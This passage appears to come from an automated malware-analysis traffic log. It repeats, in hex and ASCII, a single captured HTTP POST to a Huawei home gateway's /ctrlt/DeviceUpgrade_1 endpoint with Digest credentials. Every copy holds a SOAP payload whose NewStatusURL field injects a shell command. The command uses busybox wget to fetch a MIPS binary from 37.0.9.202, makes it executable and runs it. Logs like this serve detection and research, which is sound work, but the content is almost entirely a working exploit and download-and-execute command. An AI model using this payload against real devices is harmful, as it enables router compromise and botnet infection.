3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
